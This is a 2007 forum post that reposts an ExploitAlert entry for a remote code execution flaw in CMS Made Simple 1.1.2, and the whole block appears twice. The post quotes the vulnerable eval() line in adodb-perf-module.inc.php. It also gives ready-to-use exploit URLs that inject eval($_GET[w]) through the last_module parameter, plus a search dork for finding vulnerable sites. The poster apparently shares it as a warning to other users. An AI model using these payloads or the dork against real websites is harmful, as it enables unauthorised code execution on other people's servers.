CMS Made Simple 1.2 Remote Code Execution Vulnerability
Posted: Tue Oct 30, 2007 10:29 pm
I ran across this today..
I saw the version in the title...
it's probably old, and already taken care of, but I thought I'd post it here just in case.
John
http://securityreason.com/exploitalert/2811
Topic : CMS Made Simple 1.2 Remote Code Execution Vulnerability
ExploitAlert : 2811
Credit : irk4z
Date : 24.9.2007
Download
Exploit Code :
# o [bug]
/"*._ _ #
# . . . .-*'`
`*-.._.-'/ #
# o o < * )) ,
( #
# . o
`*-._`._(__.--*"`.\ #
#
#
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability #
# author: irk4z@yahoo.pl
#
# download:
#
#
http://dev.cmsmadesimple.org/frs/downlo ... adesimple-
1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2"
#
# greetz: cOndemned, kacper, str0ke
#
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module .
'_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=[ PHPCODE ]
I saw the version in the title...
it's probably old, and already taken care of, but I thought I'd post it here just in case.
John
http://securityreason.com/exploitalert/2811
Topic : CMS Made Simple 1.2 Remote Code Execution Vulnerability
ExploitAlert : 2811
Credit : irk4z
Date : 24.9.2007
Download
Exploit Code :
# o [bug]
/"*._ _ #
# . . . .-*'`
`*-.._.-'/ #
# o o < * )) ,
( #
# . o
`*-._`._(__.--*"`.\ #
#
#
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability #
# author: irk4z@yahoo.pl
#
# download:
#
#
http://dev.cmsmadesimple.org/frs/downlo ... adesimple-
1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2"
#
# greetz: cOndemned, kacper, str0ke
#
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module .
'_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=[ PHPCODE ]